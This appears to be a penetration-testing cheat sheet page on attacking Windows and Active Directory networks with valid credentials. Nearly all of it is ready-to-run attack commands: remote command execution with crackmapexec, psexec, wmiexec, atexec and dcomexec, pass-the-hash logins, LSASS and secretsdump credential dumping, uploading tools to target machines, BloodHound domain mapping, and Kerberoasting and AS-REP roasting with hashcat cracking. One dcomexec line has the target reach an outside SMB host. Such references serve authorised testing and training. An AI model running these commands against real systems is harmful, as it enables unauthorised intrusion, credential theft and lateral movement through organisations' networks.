########
w/ Creds
########

|

.. code-block:: bash

    RHOSTS="192.168.1.0/24"
    USER='user'
    PASS='pass'
    crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami
    crackmapexec rdp $RHOSTS -u"$USER" -p"$PASS"
    crackmapexec winrm $RHOSTS -u"$USER" -p"$PASS" -x whoami
    crackmapexec wmi $RHOSTS -u"$USER" -p"$PASS" -x whoami
    crackmapexec mssql $RHOSTS -u"$USER" -p"$PASS" -x whoami
    crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS"
    crackmapexec ldap $RHOSTS -u"$USER" -p"$PASS" -M adcs

    crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares -x whoami --local-auth
    crackmapexec smb $RHOSTS -u"$USER" -p"$PASS" --shares --put-file rustscan.exe /windows/temp/rustscan.exe
    crackmapexec smb $RHOSTS -u"$USER" --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
    crackmapexec smb $RHOSTS -u"Administrator" -p"$PASS" -M lsassy

    enum4linux $RHOSTS -u "$USER" -p "$PASS"

.. code-block:: bash

    mkdir /tmp/share
    xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
    xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
    
    psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
    psexec.py 'Administrator':'pass'@1.2.3.4
    psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
    smbexec.py 'Administrator':'pass'@1.2.3.4

    secretsdump.py Administrator:'pass'@1.2.3.4 -history
    secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history

    wmiexec.py -k "user.ccache" 'powershell.exe "whoami /all"'
    wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
    atexec.py 'user':'pass'@1.2.3.4 whoami
    dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
    dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput # test for execution, listen on 445 first

|

| LDAP enumeration

.. code-block:: bash

    ldeep ldap -u user -p 'pass' -d do.main -s ldaps://1.2.3.4:636 all /tmp/ldeep
    ldapdomaindump ldaps://1.2.3.4:3269 -u 'do.main\user' -p 'pass'

|

**********
Bloodhound
**********

| DC access required

.. code-block:: bash

    pip3 install --upgrade bloodhound
    cd $(mktemp -d)
    proxychains -q -f /tmp/PIVOT bloodhound-python --dns-tcp -u'user' -p'pass' -ns '1.2.3.10' -d 'do.main' -c All

    # https://github.com/BloodHoundAD/BloodHound/releases
    ./BloodHound --no-sandbox # Drag & drop files from last step

.. code-block:: bash

    # Any unconstrained Delegation ? (BH query)
    MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

    # Any constrained Delegation ? (BH query)
    MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate]->(t)) return p

    # Find all the edges that any user has against all the nodes (BH query).
    MATCH (n:User) MATCH p=allShortestPaths((n)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|AdminTo|CanRDP|ExecuteDCOM|ForceChangePassword*1..]->(m:Computer)) RETURN p

    # kerberoast ? (BH query)
    MATCH (n:User)WHERE n.hasspn=true RETURN n
    # GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /tmp/hashes.kerberoast 
    # hashcat -m 13100 -a 0 /tmp/hashes.kerberoast rockyou.txt --potfile-path=HASHCATPOT

    # preauth req ? (BH query)
    MATCH (u:User {dontreqpreauth: true}) RETURN u
    # GetNPUsers.py -debug 'do.main/' -usersfile /tmp/users -outputfile /tmp/hashes.aspreroast -format hashcat -dc-ip 1.2.3.10
    # sudo hashcat -m 18200 /tmp/hashes.aspreroast rockyou.txt --potfile-path=HASHCATPOT

|